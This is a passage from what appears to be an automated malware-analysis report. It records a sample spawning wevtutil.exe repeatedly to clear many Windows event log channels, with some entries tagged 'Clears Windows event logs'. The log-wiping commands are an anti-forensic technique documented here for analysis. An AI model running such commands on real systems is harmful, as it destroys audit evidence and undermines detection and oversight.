        wevtutil.exe cl "Microsoft-Windows-Data-Pdf/Debug"
        7⤵
        
        PID:5924
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/Admin"
        7⤵
        
        PID:4808
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/CrashRecovery"
        7⤵
        
        PID:284
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"
        7⤵
        
        PID:300
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"
        7⤵
        
        PID:316
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"
        7⤵
        
        PID:2148
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Deduplication/Diagnostic"
        7⤵
        
        PID:5996
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Deduplication/Operational"
        7⤵
        
        PID:5904
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Deduplication/Performance"
        7⤵
        
        PID:6060
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Deduplication/Scrubbing"
        7⤵
        
        PID:6096
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Defrag-Core/Debug"
        7⤵
        
        PID:6112
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"
        7⤵
        
        PID:3528
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DesktopActivityModerator/Diagnostic"
        7⤵
        
        PID:6020
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DesktopWindowManager-Diag/Diagnostic"
        7⤵
        
        PID:2124
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DeviceAssociationService/Performance"
        7⤵
        
        PID:4372
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DeviceConfidence/Analytic"
        7⤵
        
        PID:1448
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DeviceGuard/Operational"
        7⤵
        
        PID:1280
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DeviceGuard/Verbose"
        7⤵
        
        PID:1512
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Admin"
        7⤵
        
        PID:4764
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Debug"
        7⤵
        
        PID:896
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Operational"
        7⤵
        
        PID:5036
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Admin"
        7⤵
        
        PID:3848
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Analytic"
        7⤵
        
        PID:5064
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Debug"
        7⤵
        
        PID:5604
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Operational"
        7⤵
        
        PID:1704
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"
        7⤵
        
        PID:5652
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"
        7⤵
        
        PID:5740
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DeviceUpdateAgent/Operational"
        7⤵
        
        PID:5672
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"
        7⤵
        Clears Windows event logs
        
        PID:3212
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"
        7⤵
        
        PID:3416
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Devices-Background/Operational"
        7⤵
        
        PID:5152
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"
        7⤵
        
        PID:5168
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"
        7⤵
        
        PID:872
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"
        7⤵
        
        PID:5128
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"
        7⤵
        
        PID:5184
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"
        7⤵
        
        PID:5176
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-AdvancedTaskManager/Analytic"
        7⤵
        
        PID:5204
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"
        7⤵
        
        PID:5192
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"
        7⤵
        
        PID:6136
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"
        7⤵
        
        PID:6044
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"
        7⤵
        
        PID:2152
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"
        7⤵
        
        PID:1136
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"
        7⤵
        
        PID:4480
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"
        7⤵
        
        PID:4356
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"
        7⤵
        
        PID:2104
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"
        7⤵
        
        PID:3568
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"
        7⤵
        
        PID:5516
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"
        7⤵
        
        PID:228
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"
        7⤵
        
        PID:4424
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"
        7⤵
        
        PID:4244
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"
        7⤵
        
        PID:5232
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"
        7⤵
        
        PID:5252
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"
        7⤵
        
        PID:5264
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"
        7⤵
        
        PID:5276
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"
        7⤵
        
        PID:2908
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"
        7⤵
        
        PID:5304
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"
        7⤵
        
        PID:5312
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"
        7⤵
        
        PID:5340
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"
        7⤵
        
        PID:2164
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"
        7⤵
        
        PID:2460
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"
        7⤵
        
        PID:900
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"
        7⤵
        
        PID:3160
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"
        7⤵
        
        PID:4976
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"
        7⤵
        
        PID:4864
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"
        7⤵
        
        PID:1600
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"
        7⤵
        
        PID:4716
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"
        7⤵
        
        PID:1112
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"
        7⤵
        
        PID:876
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Direct3D12/Analytic"
        7⤵
        
        PID:1668
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Direct3D12/Logging"
        7⤵
        
        PID:5320
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Direct3D12/PerfTiming"
        7⤵
        
        PID:5004
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Direct3D9/Analytic"
        7⤵
        
        PID:3928
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Direct3DShaderCache/Default"
        7⤵
        
        PID:2100
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DirectComposition/Diagnostic"
        7⤵
        
        PID:3748
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DirectManipulation/Diagnostic"
        7⤵
        
        PID:912
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"
        7⤵
        
        PID:2316
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"
        7⤵
        
        PID:5356
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Disk/Operational"
        7⤵
        
        PID:4088
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"
        7⤵
        
        PID:1520
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"
        7⤵
        
        PID:4944
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"
        7⤵
        
        PID:4688
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Dism-Api/Analytic"
        7⤵
        
        PID:4544
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Dism-Api/ExternalAnalytic"
        7⤵
        Clears Windows event logs
        
        PID:3336
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Dism-Api/InternalAnalytic"
        7⤵
        
        PID:1004
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Dism-Cli/Analytic"
        7⤵
        
        PID:1976
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"
        7⤵
        
        PID:1812
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"
        7⤵
        
        PID:2520
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"
        7⤵
        
        PID:5520
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Documents/Performance"
        7⤵
        Clears Windows event logs
        
        PID:5552
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Dot3MM/Diagnostic"
        7⤵
        
        PID:5508
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"
        7⤵
        
        PID:1684
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DucUpdateAgent/Operational"
        7⤵
        
        PID:2032
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Dwm-API/Diagnostic"
        7⤵
        
        PID:3784
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Dwm-Core/Diagnostic"
        7⤵
        
        PID:4756
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Dwm-Dwm/Diagnostic"
        7⤵
        
        PID:3744
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Dwm-Redir/Diagnostic"
        7⤵
        
        PID:5104
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Dwm-Udwm/Diagnostic"
        7⤵
        
        PID:3480
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DxgKrnl-Admin"
        7⤵
        
        PID:4184
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DxgKrnl-Operational"
        7⤵
        
        PID:1944
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Contention"
        7⤵
        Clears Windows event logs
        
        PID:2984
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"
        7⤵
        
        PID:4740
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"
        7⤵
        
        PID:392
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Power"
        7⤵
        
        PID:3176
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"
        7⤵
        
        PID:5372
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EDP-Application-Learning/Admin"
        7⤵
        
        PID:4972
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EDP-Audit-Regular/Admin"
        7⤵
        
        PID:5564
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EDP-Audit-TCB/Admin"
        7⤵
        
        PID:4440
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EFS/Debug"
        7⤵
        
        PID:640
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ESE/IODiagnose"
        7⤵
        
        PID:2844
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ESE/Operational"
        7⤵
        
        PID:1688
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"
        7⤵
        
        PID:3616
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EapHost/Debug"
        7⤵
        
        PID:732
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EapHost/Operational"
        7⤵
        
        PID:1948
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EapMethods-RasChap/Operational"
        7⤵
        
        PID:3628
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EapMethods-RasTls/Operational"
        7⤵
        
        PID:5576
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EapMethods-Sim/Operational"
        7⤵
        
        PID:3768
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EapMethods-Ttls/Operational"
        7⤵
        Clears Windows event logs
        
        PID:4536
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"
        7⤵
        
        PID:1492
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Energy-Estimation-Engine/EventLog"
        7⤵
        
        PID:2524
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Energy-Estimation-Engine/Trace"
        7⤵
        
        PID:5396
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EnhancedStorage-EhStorTcgDrv/Analytic"
        7⤵
        
        PID:2352
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"
        7⤵
        
        PID:5636
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"
        7⤵
        
        PID:3220
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"
        7⤵
        
        PID:4416
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"
        7⤵
        
        PID:3684
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EventLog/Debug"
        7⤵
        
        PID:4076
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FMS/Analytic"
        7⤵
        
        PID:5692
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FMS/Debug"
        7⤵
        Clears Windows event logs
        
        PID:5656
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FMS/Operational"
        7⤵
        
        PID:5732
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"
        7⤵
        
        PID:5700
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"
        7⤵
        
        PID:3632
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FeatureConfiguration/Analytic"
        7⤵
        
        PID:5816
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FeatureConfiguration/Operational"
        7⤵
        Clears Windows event logs
        
        PID:5780
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FileHistory-Catalog/Analytic"
        7⤵
        
        PID:5892
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FileHistory-Catalog/Debug"
        7⤵
        
        PID:524
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FileHistory-ConfigManager/Analytic"
        7⤵
        
        PID:2120
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FileHistory-ConfigManager/Debug"
        7⤵
        
        PID:5840
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FileHistory-Core/Analytic"
        7⤵
        
        PID:5844
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FileHistory-Core/Debug"
        7⤵
        
        PID:4708
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FileHistory-Core/WHC"
        7⤵
        
        PID:5848
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FileHistory-Engine/Analytic"
        7⤵
        
        PID:5992
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FileHistory-Engine/BackupLog"
        7⤵
        
        PID:5952
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FileHistory-Engine/Debug"
        7⤵
        
        PID:5908
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FileHistory-EventListener/Analytic"
        7⤵
        
        PID:5944
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FileHistory-EventListener/Debug"
        7⤵
        
        PID:2736
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FileHistory-Service/Analytic"
        7⤵
        
        PID:288
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FileHistory-Service/Debug"
        7⤵
        
        PID:312
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FileHistory-UI-Events/Analytic"
        7⤵
        
        PID:440
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FileHistory-UI-Events/Debug"
        7⤵
        
        PID:5920
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"
        7⤵
        
        PID:6004
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"
        7⤵
        
        PID:6032
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"
        7⤵
        
        PID:3572
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"
        7⤵
        
        PID:6104
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"
        7⤵
        
        PID:6116
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-GPIO-ClassExtension/Analytic"
        7⤵
        
        PID:3820
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-GenericRoaming/Admin"
        7⤵
        
        PID:2624
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"
        7⤵
        
        PID:2556
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HAL/Debug"
        7⤵
        
        PID:5044
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"
        7⤵
        
        PID:2084
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"
        7⤵
        
        PID:1748
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"
        7⤵
        
        PID:1068
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HelloForBusiness/Operational"
        7⤵
        
        PID:3860
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Help/Operational"
        7⤵
        
        PID:3660
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"
        7⤵
        
        PID:6016
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"
        7⤵
        
        PID:4296
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"
        7⤵
        
        PID:5072
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"
        7⤵
        
        PID:3896
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"
        7⤵
        
        PID:3952
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"
        7⤵
        
        PID:5756
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HotspotAuth/Analytic"
        7⤵
        
        PID:5664
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HotspotAuth/Operational"
        7⤵
        
        PID:2420
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HttpService/Log"
        7⤵
        
        PID:4484
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HttpService/Trace"
        7⤵
        
        PID:4952
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Admin"
        7⤵
        
        PID:5140
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Analytic"
        7⤵
        
        PID:5124
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Debug"
        7⤵
        
        PID:2116
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Diagnose"
        7⤵
        Clears Windows event logs
        
        PID:1828
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Operational"
        7⤵
        Clears Windows event logs
        
        PID:4196
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Hyper-V-Hypervisor-Admin"
        7⤵
        
        PID:2020
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Hyper-V-Hypervisor-Analytic"
        7⤵
        
        PID:3032
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Hyper-V-Hypervisor-Operational"
        7⤵
        Clears Windows event logs
        
        PID:5196
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Hyper-V-NETVSC/Diagnostic"
        7⤵
        
        PID:6128
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Hyper-V-VID-Admin"
        7⤵
        
        PID:6048
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Hyper-V-VID-Analytic"
        7⤵
        
        PID:4324
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IE-SmartScreen"
        7⤵
        
        PID:1284
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IKE/Operational"
        7⤵
        
        PID:824
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"
        7⤵
        
        PID:420
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IME-Broker/Analytic"
        7⤵
        
        PID:1052
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IME-CandidateUI/Analytic"
        7⤵
        
        PID:4012
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IME-CustomerFeedbackManager/Debug"
        7⤵
        
        PID:5512
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IME-CustomerFeedbackManagerUI/Analytic"
        7⤵
        
        PID:4360
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IME-JPAPI/Analytic"
        7⤵
        
        PID:236
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IME-JPLMP/Analytic"
        7⤵
        
        PID:3472
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IME-JPPRED/Analytic"
        7⤵
        
        PID:5228
        
        C:\Windows\system32\wevtutil.exe
        
